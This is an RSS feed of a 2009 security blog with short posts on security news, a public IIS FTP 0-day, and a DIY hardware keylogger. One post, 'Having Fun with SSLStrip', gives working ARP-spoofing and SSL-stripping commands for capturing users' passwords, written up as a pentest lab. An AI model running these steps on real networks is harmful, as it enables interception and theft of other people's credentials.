<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SecurityWire Blog &#187; Security News</title>
	<atom:link href="http://blog.securitywire.com/category/security-news/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.securitywire.com</link>
	<description>Computer and Network Security, Penetration Testing, Vulnerability Research, Cryptography and more!</description>
	<lastBuildDate>Mon, 11 Jan 2010 03:54:54 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Howard Schmidt as cybersecurity coordinator</title>
		<link>http://blog.securitywire.com/2009/12/24/howard-schmidt-as-cybersecurity-coordinator/</link>
		<comments>http://blog.securitywire.com/2009/12/24/howard-schmidt-as-cybersecurity-coordinator/#comments</comments>
		<pubDate>Thu, 24 Dec 2009 05:47:07 +0000</pubDate>
		<dc:creator>merc</dc:creator>
				<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://blog.securitywire.com/?p=104</guid>
		<description><![CDATA[Howard Schmidt as cybersecurity coordinator]]></description>
			<content:encoded><![CDATA[<p>There has been a lot of chatter around Howard Schmidt being picked as cybersecurity &#8220;czar&#8221; at the white house this week and I just wanted to throw my two cents in. I recently had the opportunity to hear Mr. Schmidt speak at the central ohio infosec summit 2009 and I can attest that Howard is  a very sharp guy.  I believe Mr. Schmidt both posses the business and technical skills required with his new high level position at the white house. Howard has demonstrated both deep level understanding in business and technical issue surrounding information security and I am looking forward to see the  changes he will introduce to in the next few years. To put it simply Howard is a security geek with an acute business sense.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.securitywire.com/2009/12/24/howard-schmidt-as-cybersecurity-coordinator/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Having Fun with SSLStrip</title>
		<link>http://blog.securitywire.com/2009/11/25/having-fun-with-sslstrip/</link>
		<comments>http://blog.securitywire.com/2009/11/25/having-fun-with-sslstrip/#comments</comments>
		<pubDate>Thu, 26 Nov 2009 03:43:44 +0000</pubDate>
		<dc:creator>ospf5</dc:creator>
				<category><![CDATA[Security News]]></category>
		<category><![CDATA[Penetration Testing]]></category>

		<guid isPermaLink="false">http://blog.securitywire.com/?p=99</guid>
		<description><![CDATA[Intro
Ettercap was a very nice and easy way to sniff passwords and it still is for the most part. A recent issue has been the fact that the popular browsers have made their warnings about SSL certificates a little more scary. The old warnings looked harmless, the sheep would just click yes and the wolf [...]]]></description>
			<content:encoded><![CDATA[<p>Intro</p>
<p>Ettercap was a very nice and easy way to sniff passwords and it still is for the most part. A recent issue has been the fact that the popular browsers have made their warnings about SSL certificates a little more scary. The old warnings looked harmless, the sheep would just click yes and the wolf would then have access to their paypal account. The newer warnings are a little more scary but from what I&#8217;ve seen aren&#8217;t much of a deterrent to the clicktards out there it will be rare that they know they&#8217;re being sniffed. When doing a pentest we want passwords of the network administrators not of the lowly sheep. Most network admins are at least a little security aware<br />
Problem: Newer versions of popular webbrowsers have better warnings for SSL Certificate errors. This helps advanced users become aware that there may be a MITM attack going on. Most &#8220;clicktards&#8221; will ignore these warnings anyway and relinquish their logons to you but we want Network Admin passwords in our pentest.</p>
<p>Solution: Use SSL Strip. This will strip off all SSL information and pass the page to the victim as HTTP not HTTPS so no warning and only the most astute and paranoid users will notice this.</p>
<p>My lab is as follows. BackTrack 4 live and a windows XP machine which will be my victim.</p>
<p>Here is what I did step by step in BT4 Live boot to get this to work.</p>
<p>1. Start networking on BT4</p>
<p> /etc/init.d/networking start</p>
<p>2. Enable ipv4 forewarding</p>
<p> echo &#8220;1&#8243; &gt; /proc/sys/net/ipv4/ip_forward</p>
<p>3. Create an iptables rule to foreward traffic destined for port 80 to the port used by sslstrip which is 10000 by default<br />
 <br />
 iptables -t nat -A PREROUTING -p tcp &#8211;destination-port 80 -j REDIRECT &#8211;to-port 10000</p>
<p>4. Now we need to start arpspoof to poision the victims arptable<br />
 <br />
 arpspoof -i eth0 -t &lt;Victims IP Address&gt; &lt;The Gateways IP Address&gt;</p>
<p>5. now we start sslstrip with the -a switch<br />
 <br />
 sslstrip -a</p>
<p>6. next we need to start ettercap<br />
 <br />
 ettercap -T -q -i eth0</p>
<p>7. wait for someone to logon and grab their password!!</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.securitywire.com/2009/11/25/having-fun-with-sslstrip/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>IIS FTP remote stack overflow 0-day</title>
		<link>http://blog.securitywire.com/2009/08/31/iis-ftp-remote-buffer-overflow-0-day/</link>
		<comments>http://blog.securitywire.com/2009/08/31/iis-ftp-remote-buffer-overflow-0-day/#comments</comments>
		<pubDate>Mon, 31 Aug 2009 20:42:43 +0000</pubDate>
		<dc:creator>merc</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Security News]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[IIS]]></category>
		<category><![CDATA[metasploit]]></category>

		<guid isPermaLink="false">http://blog.securitywire.com/?p=82</guid>
		<description><![CDATA[A new 0-day exploit has been posted on milworm at http://milw0rm.com/exploits/9541 The new 0-day is for microsoft IIS 5&#8217;s (windows 2000) FTP service. Also claimed to work on IIS 6 (windows 2003) with stack cookie protection enabled. Metasploit development is already underway to integrate this new exploit.
]]></description>
			<content:encoded><![CDATA[<p>A new 0-day exploit has been posted on milworm at <a title="IIS 5 and 6 FTP exploit" href="http://milw0rm.com/exploits/9541" target="_blank">http://milw0rm.com/exploits/9541</a> The new 0-day is for microsoft IIS 5&#8217;s (windows 2000) FTP service. Also claimed to work on IIS 6 (windows 2003) with stack cookie protection enabled. Metasploit development is already underway to integrate this new exploit.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.securitywire.com/2009/08/31/iis-ftp-remote-buffer-overflow-0-day/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HNN The Hacker News Network</title>
		<link>http://blog.securitywire.com/2009/07/25/hnn-the-hacker-news-network/</link>
		<comments>http://blog.securitywire.com/2009/07/25/hnn-the-hacker-news-network/#comments</comments>
		<pubDate>Sat, 25 Jul 2009 04:55:27 +0000</pubDate>
		<dc:creator>merc</dc:creator>
				<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://blog.securitywire.com/?p=54</guid>
		<description><![CDATA[If you have been around the security scene for a while then you should well remember HNN the hacker news network and Space Rogue from the l0pht heavy industries. After quite a few years of down time, it looks like Space Rogue now has a new video newscast for this week and is planning for [...]]]></description>
			<content:encoded><![CDATA[<p>If you have been around the security scene for a while then you should well remember HNN the hacker news network and Space Rogue from the l0pht heavy industries. After quite a few years of down time, it looks like Space Rogue now has a new video newscast for this week and is planning for a full launch on 01/11/10. . HNN was always a  good source of the latest news in the security world and will be quite refreshing to see what they have in store for us this time around! The new video format for HNN should be interesting. Check out there web site and be ready for the return!</p>
<p><a href="http://www.hackernews.com/">The Hacker News Network</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.securitywire.com/2009/07/25/hnn-the-hacker-news-network/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IE and Visual Studio out of band patch from Microsoft next Tuesday</title>
		<link>http://blog.securitywire.com/2009/07/24/ie-and-visual-studio-out-of-band-patch-from-microsoft-next-tuesday/</link>
		<comments>http://blog.securitywire.com/2009/07/24/ie-and-visual-studio-out-of-band-patch-from-microsoft-next-tuesday/#comments</comments>
		<pubDate>Sat, 25 Jul 2009 03:34:20 +0000</pubDate>
		<dc:creator>merc</dc:creator>
				<category><![CDATA[Security News]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://blog.securitywire.com/?p=52</guid>
		<description><![CDATA[Out of band release from Microsoft coming next Tuesday for Visual Studio with extra protection of the source issue in IE. They will be patching a few critical extra holes in IE at the same time. No details yet as to what issues are going to be patched. Most likely they will be significant and [...]]]></description>
			<content:encoded><![CDATA[<p>Out of band release from Microsoft coming next Tuesday for Visual Studio with extra protection of the source issue in IE. They will be patching a few critical extra holes in IE at the same time. No details yet as to what issues are going to be patched. Most likely they will be significant and possibly already being exploited since Microsoft has not been deviating much for their patch Tuesday schedule recently. They hint that customers that are already up to date with security updates are not vulnerable to known attack so this could be more about fixing the source of a known issue to prevent exploitation from other attack vectors. The bulletin points out that developers will have to keep an eye out for any applications that use this vulnerable functionality and take action to mitigate this risk.</p>
<p>Keep an eye on the buletin at: <a href="http://www.microsoft.com/technet/security/bulletin/ms09-jul-ans.mspx" target="_blank">http://www.microsoft.com/technet/security/bulletin/ms09-jul-ans.mspx</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.securitywire.com/2009/07/24/ie-and-visual-studio-out-of-band-patch-from-microsoft-next-tuesday/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>KeeLog &#8211; DIY hardware PS/2 wireless keylogger</title>
		<link>http://blog.securitywire.com/2009/07/19/keelog-diy-hardware-ps2-wireless-keylogger/</link>
		<comments>http://blog.securitywire.com/2009/07/19/keelog-diy-hardware-ps2-wireless-keylogger/#comments</comments>
		<pubDate>Sun, 19 Jul 2009 04:17:41 +0000</pubDate>
		<dc:creator>merc</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Security News]]></category>
		<category><![CDATA[Keylogging]]></category>

		<guid isPermaLink="false">http://blog.securitywire.com/?p=28</guid>
		<description><![CDATA[KeeLog has nice online article on how to build a hardware ps/2 wireless keylogger.  Sounds like a fun project and maybe someday I&#8217;ll have time to tackle it.  The article comes with full instructions on how to build the transmitter and  receiver. They also include  a windows driver to make the receiver act as a [...]]]></description>
			<content:encoded><![CDATA[<p>KeeLog has <a title="Wireless Keylogger" href="http://www.keelog.com/wireless_keylogger.html" target="_blank">nice online article</a> on how to build a hardware ps/2 wireless keylogger.  Sounds like a fun project and maybe someday I&#8217;ll have time to tackle it.  The article comes with full instructions on how to build the transmitter and  receiver. They also include  a windows driver to make the receiver act as a virtual COM port so data can be monitored using any standard terminal application that supports serial ports.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.securitywire.com/2009/07/19/keelog-diy-hardware-ps2-wireless-keylogger/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
